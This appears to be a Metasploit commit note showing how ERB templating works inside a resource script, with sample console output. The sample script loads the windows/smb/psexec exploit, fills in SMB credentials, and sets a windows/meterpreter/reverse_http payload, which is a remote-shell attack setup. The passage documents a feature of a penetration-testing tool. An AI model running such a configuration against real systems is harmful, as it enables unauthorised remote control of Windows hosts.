rhost = ""
smbuser = "test"
smbpass = "pass"
payload = "windows/meterpreter/reverse_http"
puts "This will happen while i preprocess an erb-enabled rc file"
use windows/smb/psexec
set RHOST <%= rhost %>
set SMBUser <%= smbuser %>
set SMBPass <%= smbpass %>
set PAYLOAD <%= payload %>
puts "Now, i should print the system path while running the actual resource file! "
puts ENV["PATH"]
puts "end"
<%= puts "This will also happen when i preprocess too" %>
which will give you output like this:
[*] Processing /home/jcran/Desktop/test_erb_rc for ERB directives.
This will happen while i preprocess an erb-enabled rc file
This will also happen when i preprocess too
resource (/home/jcran/Desktop/test_erb_rc)> use windows/smb/psexec
resource (/home/jcran/Desktop/test_erb_rc)> set RHOST
resource (/home/jcran/Desktop/test_erb_rc)> set SMBUser test
SMBUser => test
resource (/home/jcran/Desktop/test_erb_rc)> set SMBPass pass
SMBPass => pass
resource (/home/jcran/Desktop/test_erb_rc)> set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
resource (/home/jcran/Desktop/test_erb_rc)> save
Saved configuration to: /home/jcran/.msf4/config
[*] resource (/home/jcran/Desktop/test_erb_rc)> Ruby Code (115 bytes)
Now, i should print the system path while running the actual resource file!
msf exploit(psexec) >
git-svn-id: file:///home/svn/framework3/trunk@14013 4d416f70-5f16-0410-b530-b9f4589650da